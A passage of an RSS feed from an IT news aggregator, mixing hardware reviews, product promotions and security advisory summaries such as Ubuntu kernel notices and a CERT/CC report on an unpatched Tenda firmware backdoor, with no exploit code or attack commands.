<li><strong>NPU:</strong> 50 TOPS</li>



<li><strong>Anschlüsse:</strong> 2 × USB-C/Thunderbolt 4, USB-A, 3,5-Millimeter-Kopfhöreranschluss, Surface Connect-Anschluss</li>



<li><strong>Sicherheit:</strong> Windows Hello-Kamera</li>



<li><strong>Kamera: </strong>1080p<strong> </strong>(zum Benutzer gerichtet, Windows Hello)</li>



<li><strong>Akku:</strong> Nennkapazität: 52,3 Wattstunden, tatsächliche Kapazität laut Test: 54,1 Wattstunden</li>



<li><strong>Drahtlos:</strong> Wi-Fi 7, Bluetooth Core 5.4</li>



<li><strong>Audio:</strong> Zwei Studio-Mikrofone, Omnisonic-Lautsprecher mit Dolby Atmos</li>



<li><strong>Betriebssystem:</strong> Windows 11 Pro</li>



<li><strong>Abmessungen:</strong> 301 Millimeter x 220 Millimeter x 17,5 Millimeter</li>



<li><strong>Gewicht:</strong> 1,35 Kilogramm</li>



<li><strong>Farben:</strong> Platin und Mattschwarz</li>



<li><strong>Preise:</strong> ab 2.119 Euro (Testmodell: 2.239 Euro)</li>
</ul>



<p>(<a href="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html" data-type="link" data-id="https://www.pcwelt.de/article/3168116/surface-laptop-8-for-business-test.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 10 Best Unified Threat Management (UTM) Solutions in 2026]]></title>
<description><![CDATA[If you need one appliance that handles firewalling, intrusion prevention, VPN, antivirus, and web filtering without a security team to run it, Fortinet FortiGate is our top UTM pick for 2026, with Sophos Firewall the strongest choice when you also…
Read more →
The post Top 10 Best Unified Threat ...]]></description>
<link>https://tsecurity.de/de/3660617/it-security-nachrichten/top-10-best-unified-threat-management-utm-solutions-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660617/it-security-nachrichten/top-10-best-unified-threat-management-utm-solutions-in-2026/</guid>
<pubDate>Fri, 10 Jul 2026 20:35:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you need one appliance that handles firewalling, intrusion prevention, VPN, antivirus, and web filtering without a security team to run it, Fortinet FortiGate is our top UTM pick for 2026, with Sophos Firewall the strongest choice when you also…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/top-10-best-unified-threat-management-utm-solutions-in-2026/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/top-10-best-unified-threat-management-utm-solutions-in-2026/">Top 10 Best Unified Threat Management (UTM) Solutions in 2026</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Our expert praised Creality's K2 Plus 3D printer after his workshop tests —  and it's just got a massive summer discount]]></title>
<description><![CDATA[Creality K2 Plus with the Premium Accessory Pack offers a feature-packed way to step into high-end 3D printing.]]></description>
<link>https://tsecurity.de/de/3660442/it-nachrichten/our-expert-praised-crealitys-k2-plus-3d-printer-after-his-workshop-tests-and-its-just-got-a-massive-summer-discount/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660442/it-nachrichten/our-expert-praised-crealitys-k2-plus-3d-printer-after-his-workshop-tests-and-its-just-got-a-massive-summer-discount/</guid>
<pubDate>Fri, 10 Jul 2026 19:04:00 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Creality K2 Plus with the Premium Accessory Pack offers a feature-packed way to step into high-end 3D printing.]]></content:encoded>
</item>
<item>
<title><![CDATA[Top 10 Best Unified Threat Management (UTM) Solutions in 2026]]></title>
<description><![CDATA[If you need one appliance that handles firewalling, intrusion prevention, VPN, antivirus, and web filtering without a security team to run it, Fortinet FortiGate is our top UTM pick for 2026, with Sophos Firewall the strongest choice when you also run Sophos endpoints. Unified threat management (...]]></description>
<link>https://tsecurity.de/de/3660223/it-security-nachrichten/top-10-best-unified-threat-management-utm-solutions-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660223/it-security-nachrichten/top-10-best-unified-threat-management-utm-solutions-in-2026/</guid>
<pubDate>Fri, 10 Jul 2026 17:40:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>If you need one appliance that handles firewalling, intrusion prevention, VPN, antivirus, and web filtering without a security team to run it, Fortinet FortiGate is our top UTM pick for 2026, with Sophos Firewall the strongest choice when you also run Sophos endpoints. Unified threat management (UTM) consolidates multiple network security functions into a single […]</p>
<p>The post <a href="https://cybersecuritynews.com/best-unified-threat-management-solutions/">Top 10 Best Unified Threat Management (UTM) Solutions in 2026</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Cook in My Air Fryer Every Day. Here Are the 10 Times It Let Me Down]]></title>
<description><![CDATA[After hundreds of air fryer meals, these are the 10 that taught me where the appliance's real limits are.]]></description>
<link>https://tsecurity.de/de/3660057/it-nachrichten/i-cook-in-my-air-fryer-every-day-here-are-the-10-times-it-let-me-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660057/it-nachrichten/i-cook-in-my-air-fryer-every-day-here-are-the-10-times-it-let-me-down/</guid>
<pubDate>Fri, 10 Jul 2026 16:48:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[After hundreds of air fryer meals, these are the 10 that taught me where the appliance's real limits are.]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8530-1: Linux kernel (AWS) vulnerabilities]]></title>
<description><![CDATA[It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker co...]]></description>
<link>https://tsecurity.de/de/3659406/unix-server/usn-8530-1-linux-kernel-aws-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659406/unix-server/usn-8530-1-linux-kernel-aws-vulnerabilities/</guid>
<pubDate>Fri, 10 Jul 2026 12:31:14 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that the Linux kernel did not properly handle shared page
fragments during socket buffer operations, collectively known as Dirty
Frag. A logic flaw existed in the XFRM ESP-in-TCP subsystem and in the
RxRPC networking subsystem when processing paged fragments. A local
attacker could use this to escalate privileges, or possibly escape a
container. (CVE-2026-43284)

It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - InfiniBand drivers;
  - SCSI subsystem;
  - Thermal drivers;
  - USB over IP driver;
  - Network file system (NFS) server daemon;
  - SMB network file system;
  - Tracing infrastructure;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - Ceph Core library;
  - DCCP (Datagram Congestion Control Protocol);
  - IPv4 networking;
  - IPv6 networking;
  - Netfilter;
  - RxRPC session sockets;
  - X.25 network layer;
(CVE-2021-47202, CVE-2024-56643, CVE-2026-23272, CVE-2026-23455,
CVE-2026-31402, CVE-2026-31607, CVE-2026-31637, CVE-2026-31659,
CVE-2026-31682, CVE-2026-31685, CVE-2026-43011, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43383, CVE-2026-43407, CVE-2026-43414,
CVE-2026-45988, CVE-2026-46043, CVE-2026-46119, CVE-2026-46243)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8529-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503)

Several security issue...]]></description>
<link>https://tsecurity.de/de/3659370/unix-server/usn-8529-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659370/unix-server/usn-8529-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Fri, 10 Jul 2026 12:16:29 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that a logic flaw existed in the XFRM ESP-in-TCP
subsystem in the Linux kernel when handling socket buffer fragments. This
flaw is known as Fragnesia. A local attacker could use this to escalate
privileges, or possibly escape a container. (CVE-2026-43503)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - InfiniBand drivers;
  - SCSI subsystem;
  - Thermal drivers;
  - USB over IP driver;
  - Network file system (NFS) server daemon;
  - SMB network file system;
  - Tracing infrastructure;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - Ceph Core library;
  - DCCP (Datagram Congestion Control Protocol);
  - IPv4 networking;
  - IPv6 networking;
  - Netfilter;
  - RxRPC session sockets;
  - X.25 network layer;
(CVE-2021-47202, CVE-2024-56643, CVE-2026-23272, CVE-2026-23455,
CVE-2026-31402, CVE-2026-31607, CVE-2026-31637, CVE-2026-31659,
CVE-2026-31682, CVE-2026-31685, CVE-2026-43011, CVE-2026-43037,
CVE-2026-43038, CVE-2026-43383, CVE-2026-43407, CVE-2026-43414,
CVE-2026-45988, CVE-2026-46043, CVE-2026-46119, CVE-2026-46243)]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [UNGEPATCHT] [mittel] Kyocera Printer: Schwachstelle ermöglicht Offenlegung von Informationen]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Kyocera Printer ausnutzen, um Informationen offenzulegen.]]></description>
<link>https://tsecurity.de/de/3659314/it-security-nachrichten/neu-ungepatcht-mittel-kyocera-printer-schwachstelle-ermoeglicht-offenlegung-von-informationen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659314/it-security-nachrichten/neu-ungepatcht-mittel-kyocera-printer-schwachstelle-ermoeglicht-offenlegung-von-informationen/</guid>
<pubDate>Fri, 10 Jul 2026 11:53:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Kyocera Printer ausnutzen, um Informationen offenzulegen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Big Tech is Acting Kind of Dodgy At the Moment]]></title>
<description><![CDATA[Author: ColdFusion - Bewertung: 100x - Views:1144 Visit https://brilliant.org/coldfusion to try Brilliant’s tutor for free and get a 20% off an annual subscription. 

For the longest time, big tech was seen as the perpetual money printer but now things have changed. The AI frenzy has drained free...]]></description>
<link>https://tsecurity.de/de/3659050/videos/big-tech-is-acting-kind-of-dodgy-at-the-moment/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659050/videos/big-tech-is-acting-kind-of-dodgy-at-the-moment/</guid>
<pubDate>Fri, 10 Jul 2026 10:02:41 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: ColdFusion - Bewertung: 100x - Views:1144 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/dVNSA19nz8s?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Visit https://brilliant.org/coldfusion to try Brilliant’s tutor for free and get a 20% off an annual subscription. <br />
<br />
For the longest time, big tech was seen as the perpetual money printer but now things have changed. The AI frenzy has drained free cash flow and driven these companies to employ interesting accounting practices. <br />
<br />
Watch or listen to ColdFusion on Spotify: https://open.spotify.com/show/1YEwCKoRz8fEDqheXB6UJ1<br />
<br />
Additional music by Loxe:<br />
https://www.instagram.com/loxetheproducer/?hl=en<br />
https://open.spotify.com/artist/4Jb1EAbXK4BpbQopoeMWKT<br />
<br />
ColdFusion Music: <br />
<br />
https://www.youtube.com/@coldfusionmusic<br />
http://burnwater.bandcamp.com   <br />
<br />
ColdFusion Socials: <br />
<br />
https://discord.gg/coldfusion<br />
https://facebook.com/ColdFusionTV <br />
https://twitter.com/ColdFusion_TV <br />
https://instagram.com/coldfusiontv<br />
<br />
Created by: Dagogo Altraide<br />
Producers: Tawsif Akkas, Dagogo Altraide<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s real bottleneck isn’t compute. It’s distance.]]></title>
<description><![CDATA[A researcher has an idea worth testing before lunch. The model is ready. The data is sitting right there. But the data is sensitive — regulated, proprietary; the kind that legal has been very clear cannot leave the building. So it can’t go to the cloud cluster. And even if it could, the GPU queue...]]></description>
<link>https://tsecurity.de/de/3657618/it-nachrichten/ais-real-bottleneck-isnt-compute-its-distance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3657618/it-nachrichten/ais-real-bottleneck-isnt-compute-its-distance/</guid>
<pubDate>Thu, 09 Jul 2026 18:02:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A researcher has an idea worth testing before lunch. The model is ready. The data is sitting right there. But the data is sensitive — regulated, proprietary; the kind that legal has been very clear cannot leave the building. So it can’t go to the cloud cluster. And even if it could, the GPU queue is hours deep, the meter is running, and by the time the run finishes and the bill lands, the spark of the idea has cooled into a ticket in a backlog. </p>



<p>This is the unglamorous reality behind a lot of enterprise AI. Not a shortage of talent or ambition, but friction — the quiet tax paid every time a brilliant question has totravel a long way to find the computer that can answer it. We’ve spent the better part of a decade assuming that distance didn’t matter, that everything important would happen in some vast facility hundreds of miles away. For a whole class of work, that assumption is now the thing holding teams back. </p>



<h3 class="wp-block-heading"><strong>The last mile of AI</strong> </h3>



<p>Cloud and hyperscale data centers did something extraordinary: they made a near-infinite compute available to anyone with a credit card. That scale is genuinely irreplaceable for training frontier models. But scale solved the wrong problem for a surprising number of teams. </p>



<p>Because a lot of real AI work isn’t a once-a-quarter mega run, it’s iteration — fine-tuning, experimenting, debugging, testing an agent’s behavior, running a model against data that’s too sensitive or too large to keep shipping back and forth. That work rewards <em>immediacy</em> and <em>control</em>, not raw scale. And on those two axes, the cloud-only model starts to strain in three ways. </p>



<p><strong>Governance is the first.</strong> The most valuable enterprise data is often the data that’s hardest to move — patient records, financial details, proprietary source code, designs under NDA. Sending it to a shared, off-premises environment can mean a compliance review, a risk sign-off, or simply a “no.” When the data can’t travel, neither can the AI work that depends on it — unless the compute comes to the data instead. </p>



<p><strong>Velocity is the second.</strong> AI progress is a function of how many experiments a team can run per week. Every cloud queue, every cold start, every round trip between a workstation and a remote cluster adds latency not just to a job but to <em>learning</em>. The teams that win aren’t the ones with the biggest single run; they’re the ones who can iterate fastest, privately, without asking permission. </p>



<p><strong>And then there’s the missing middle.</strong> Until recently, professionals had two options, and a chasm between them. On one side, a traditional workstation — convenient and local, but utterly unable to hold a trillion-parameter model in memory. On the other, a data center you don’t own, don’t control, and have to wait in line for. There was nothing in between: no way to put genuine, data-center-class AI power directly under the desk of the person doing the work. </p>



<p>That gap is exactly where the next wave of productivity is hiding. </p>



<h3 class="wp-block-heading"><strong>When the supercomputer comes back to the desk</strong> </h3>



<p>Computing has always swung between the central and the personal. The mainframe gave way to the PC. Now, after a decade of centralizing intelligence in the cloud, the pendulum is swinging again — and the supercomputer is coming back to the desk, this time built specifically for AI. </p>



<p>The implications for IT leaders are strategic, not just technical. A local, private AI supercomputer means sensitive workloads stay under the organization’s own governance. It means a predictable cost instead of a variable cloud meter. It means teams iterate at the speed of their own curiosity. And it means the data center is still there when a workload genuinely needs to scale — connected, not replaced. The goal isn’t to abandon the cloud. It’s to close the last mile. </p>



<h3 class="wp-block-heading"><strong>The deskside AI supercomputer: ASUS ExpertCenter Pro ET900N G3</strong> </h3>



<p>This is the gap the <strong>ASUS ExpertCenter Pro ET900N G3</strong> is engineered to close. Built on NVIDIA DGX Station architecture and powered by the NVIDIA GB300 Grace Blackwell Ultra Desktop Superchip, it brings data-center-class AI to a system that fits on a standard desk — a deskside AI supercomputer purpose-built for the way AI teams actually work. </p>



<p>What that delivers, mapped to the friction it removes: </p>



<ul class="wp-block-list">
<li><strong>Run the big models locally.</strong> With 748GB of coherent unified memory and up to 20 PFLOPS of AI performance, the ET900N G3 can develop and run trillion-parameter models and autonomous AI agents right at the deskside — far beyond the reach of a conventional workstation, and without a trip to a shared cluster. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Keep sensitive work private.</strong> Because the compute lives where the team and the data do, sensitive and regulated workloads can stay on-premises under the organization’s own governance. Full compatibility with NVIDIA AI Enterprise and NVIDIA NemoClaw enables enterprises to build and run always-on AI assistants and agents within a secure, local environment. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Iterate without waiting.</strong> A 72-core NVIDIA Grace CPU paired with an NVIDIA Blackwell Ultra GPU over high-bandwidth NVLink-C2C interconnect puts supercomputer-class iteration at a developer’s fingertips — no queue, no cold start, no round-trip. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Scale out when you need to.</strong> An integrated NVIDIA ConnectX-8 SuperNIC provides up to 800 Gbps of networking, so the deskside system bridges cleanly to data center infrastructure when a workload outgrows the desk. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Run it around the clock.</strong> Data-center-grade thermal design built for sustained 24/7 operation means the system maintains peak performance through long training and inference runs rather than throttling when the work gets serious. </li>
</ul>



<p>And it runs the NVIDIA AI software stack out of the box, giving development teams a turnkey environment for training, fine-tuning, inference, and agentic AI from day one. </p>



<h3 class="wp-block-heading"><strong>The question worth asking now</strong> </h3>



<p>For years, the strategic question in AI infrastructure was <em>how big a cluster can we reach.</em> For a growing share of the work that actually moves a business forward, the better question is: how close can we put the power in the hands of<em> the people doing the work?</em> </p>



<p>The idea was never the bottleneck. The distance was. Closing it is the next advantage. </p>



<p>Discover how the ASUS ExpertCenter Pro ET900N G3 brings data-center-class AI to the deskside. Visit us <a href="https://url.usb.m.mimecastprotect.com/s/EeB2Cxo0l0UrX9KNIvh9cyHZgE?domain=asus.com" target="_blank" rel="sponsored">here</a> to learn more.  </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[openSUSE & grommunio - The Exchange alternative (osc26)]]></title>
<description><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft E...]]></description>
<link>https://tsecurity.de/de/3656863/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656863/it-security-video/opensuse-grommunio-the-exchange-alternative-osc26/</guid>
<pubDate>Thu, 09 Jul 2026 13:33:18 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As organizations look for practical ways to regain control over their collaboration infrastructure, open source becomes more than an alternative — it becomes a foundation and requirement for digital sovereignty.

This talk presents grommunio as an open, enterprise-grade alternative to Microsoft Exchange, with a strong focus on the technology behind making it usable out of the box. The session will show how grommunio builds on the openSUSE ecosystem to deliver a complete collaboration appliance based on openSUSE 16.0, using KIWI to create a reproducible, maintainable, and deployable system image.

Rather than only discussing groupware features, this talk goes behind the scenes: how the appliance is assembled, how openSUSE provides the operating system foundation, and how grommunio packages email, calendaring, contacts, mobile synchronization, Evolution/Thunderbird/Outlook compatibility, and administration into an integrated enterprise experience.

A key focus is the out-of-the-box experience: turning a powerful open source software stack into a product that can be installed, configured, and operated by real organizations. The talk highlights how openSUSE technologies enable a reliable appliance model, how grommunio delivers enterprise collaboration on top of it, and why this matters for organizations that want to reduce vendor lock-in without compromising usability or professional requirements.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://c3voc.de]]></content:encoded>
</item>
<item>
<title><![CDATA[iPhone 18 Pro Max Could Be Thicker and Heavier Due to Bigger Battery]]></title>
<description><![CDATA[Apple’s upcoming iPhone 18 Pro Max could arrive with a thicker and heavier design, as new rumors point to a bigger battery inside the next flagship model. The change suggests Apple plans to improve battery life, but users may feel the difference in hand.



Chinese leaker Ice Universe claimed tha...]]></description>
<link>https://tsecurity.de/de/3656791/ios-mac-os/iphone-18-pro-max-could-be-thicker-and-heavier-due-to-bigger-battery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656791/ios-mac-os/iphone-18-pro-max-could-be-thicker-and-heavier-due-to-bigger-battery/</guid>
<pubDate>Thu, 09 Jul 2026 13:09:33 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple’s upcoming iPhone 18 Pro Max could arrive with a thicker and heavier design, as new rumors point to a bigger battery inside the next flagship model. The change suggests Apple plans to improve battery life, but users may feel the difference in hand.



Chinese leaker Ice Universe claimed that the iPhone 18 Pro Max will measure around 9mm thick and weigh about 240 grams. That would make it around 0.25mm thicker and roughly 7 grams heavier than the current iPhone 17 Pro Max.



Bigger Battery Could Be the Main Reason



The rumored size change appears linked to the larger battery expected inside the iPhone 18 Pro Max. Recent filings suggest the phone could feature a 5,391mAh battery in China and a 5,567mAh battery in the U.S., giving it a notable increase over the iPhone 17 Pro Max.



Apple is also expected to use a new stainless steel vapor chamber for better heat control, and that internal change could add extra weight along with the larger battery.



The iPhone 18 Pro Max could become one of Apple’s heaviest iPhones if these details turn out to be accurate.



Expected changes include:




Around 9mm thickness



About 240 grams in weight



Larger battery capacity



Better thermal management



Slightly bulkier in-hand feel




Apple is expected to launch the iPhone 18 Pro and iPhone 18 Pro Max this September, along with its first foldable iPhone.]]></content:encoded>
</item>
<item>
<title><![CDATA[CERT Warns of Unpatched Tenda Firmware Backdoor Allowing Admin Access]]></title>
<description><![CDATA[The CERT Coordination Center (CERT/CC) has disclosed a critical security issue affecting multiple Tenda networking devices. Tracked as CVE-2026-11405, the vulnerability stems from an undocumented backdoor in Tenda firmware that allows unauthenticated attackers to gain administrative access to a d...]]></description>
<link>https://tsecurity.de/de/3656250/it-security-nachrichten/cert-warns-of-unpatched-tenda-firmware-backdoor-allowing-admin-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656250/it-security-nachrichten/cert-warns-of-unpatched-tenda-firmware-backdoor-allowing-admin-access/</guid>
<pubDate>Thu, 09 Jul 2026 09:22:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1253" height="762" src="https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="CVE-2026-11405" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405.webp 1253w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-300x182.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-1024x623.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-768x467.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-600x365.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-150x91.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-750x456.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-1140x693.webp 1140w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405.webp 1253w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-300x182.webp 300w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-1024x623.webp 1024w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-768x467.webp 768w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-600x365.webp 600w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-150x91.webp 150w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-750x456.webp 750w, https://thecyberexpress.com/wp-content/uploads/CVE-2026-11405-1140x693.webp 1140w" sizes="(max-width: 1253px) 100vw, 1253px" title="CERT Warns of Unpatched Tenda Firmware Backdoor Allowing Admin Access 1"></p><span data-contrast="auto">The CERT Coordination Center (CERT/CC) has disclosed a critical security issue affecting multiple Tenda networking devices. Tracked as CVE-2026-11405, the vulnerability stems from an undocumented backdoor in Tenda firmware that allows unauthenticated attackers to gain administrative access to a device’s web management interface. The flaw remains unpatched, prompting CERT to recommend immediate mitigation measures for affected users.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">According to CERT, the <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28913">vulnerability</a> impacts multiple Tenda routers, switches, and other networking products. <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="Security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28915">Security</a> researchers discovered the issue within the login function of the device’s web server binary, where the authentication process contains logic that can be exploited to bypass normal login requirements.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">CVE-2026-11405 Backdoor Enables Authentication Bypass</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">The <a href="https://kb.cert.org/vuls/id/213560" target="_blank" rel="nofollow noopener">CERT advisory</a> explains that the authentication mechanism behaves unexpectedly after a failed login attempt. Instead of rejecting the request, the firmware retrieves a password stored in the device’s configuration.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">It then compares only the password supplied by the user against the stored plaintext password. If the passwords match, the system grants administrator-level access without verifying the username.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">“The associated username is not validated, so any provided username will succeed when paired with the backdoor password. This backdoor authentication mechanism is not documented or visible through any administrative interface,” CERT/CC explained.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Because of this behavior, CVE-2026-11405 allows attackers to bypass authentication entirely if they know or obtain the configured <a href="https://thecyberexpress.com/how-to-delete-saved-passwords-in-google-chrome/" target="_blank" rel="noopener">password</a>.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">CERT Recommends Mitigations as No Patch Is Available</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Successful exploitation of CVE-2026-11405 could enable attackers to modify device configurations, change network settings, and disable security features. CERT warns that these capabilities could ultimately result in the compromise of a local network.</span>

<span data-contrast="auto">The organization also stated that it was unable to coordinate disclosure of the vulnerability with Tenda, and no security update has been released to address the flaw.</span>

<span data-contrast="auto">Until a patch becomes available, CERT advises users to disable remote web management to block unauthorized external access. It also recommends changing the default LAN <a href="https://thecyberexpress.com/how-to-find-ip-address/" target="_blank" rel="noopener">IP address</a> to reduce the likelihood of devices being identified by automated scanning tools.</span>
<h3 aria-level="2"><b><span data-contrast="none">CERT Also Discloses Unpatched HP Printer Flaw</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">On Tuesday, CERT/CC disclosed another unpatched vulnerability affecting HP DeskJet 2800 series printers running firmware versions up to TBP1CN2612AR. The issue, tracked as CVE-2026-13753, is a missing authorization flaw that exposes sensitive administrative information.</span>

<span data-contrast="auto">According to CERT, attackers can send unauthenticated GET requests to multiple backend <a href="https://thecyberexpress.com/sms-and-otp-bombing-bypass-analysis/" target="_blank" rel="noopener">API endpoints</a>, which return administrator configuration data without validating authentication or session state. The exposed information includes the Wi-Fi Direct SSID, plaintext passphrase, unique printer serial numbers, service IDs, and administrative password state details.</span>

<span data-contrast="auto">CERT/CC summarized the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28914">risk</a>, stating, “This vulnerability allows unauthenticated access to the printer’s webserver API endpoints, exposing Wi-Fi credentials, management configuration details, and sensitive security data normally restricted to administrative users.”</span>]]></content:encoded>
</item>
<item>
<title><![CDATA[nubia Neo 5 GT Special Edition debuts with the first and only Liquid and Air Dual Active Cooling System in its class]]></title>
<description><![CDATA[PARTNER CONTENT: nubia aims to democratize premium gaming with a revolutionary AquaCore thermal architecture, launching first in Southeast Asia]]></description>
<link>https://tsecurity.de/de/3655968/it-nachrichten/nubia-neo-5-gt-special-edition-debuts-with-the-first-and-only-liquid-and-air-dual-active-cooling-system-in-its-class/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655968/it-nachrichten/nubia-neo-5-gt-special-edition-debuts-with-the-first-and-only-liquid-and-air-dual-active-cooling-system-in-its-class/</guid>
<pubDate>Thu, 09 Jul 2026 06:47:19 +0200</pubDate>
